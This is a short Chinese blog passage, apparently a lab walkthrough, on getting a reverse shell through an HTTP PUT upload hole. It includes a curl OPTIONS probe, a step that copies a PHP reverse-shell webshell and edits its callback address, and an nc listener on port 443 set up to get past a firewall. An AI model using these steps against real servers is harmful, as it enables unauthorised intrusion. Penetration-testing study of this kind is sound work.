PUT上传漏洞(缺少插件,无法做)
在本例中,只开放了22ssh,80http端口,页面没有利用价值
只好启动owasp-zap、acunetix进行网站页面漏洞扫描,也没有发现任何漏洞
路在何方?
找一个可以的浏览目录,如本例是test,测试是否存在PUT漏洞,利用该漏洞可以上传文件,进行反射攻击
步骤如下:
curl -v -X OPTIONS http://靶机IP/test 对报文头进行探测
此时发现站点报头 Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
有PUT方法
准备反弹shell,cp /usr/share/webshells/php/php_reverse_tcp.php shell.php 修改其中的反弹地址和端口号
浏览器要提前安装好poster插件,利用该插件上传shell.php
可是现在Chrome、火狐都不支持poster了
攻击机启动nc -nlvp 443 设置443端口是为了绕过防火墙
此时会反射得到一个低权限的用户www-data,接下来考虑如何提权
扫一扫
371
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
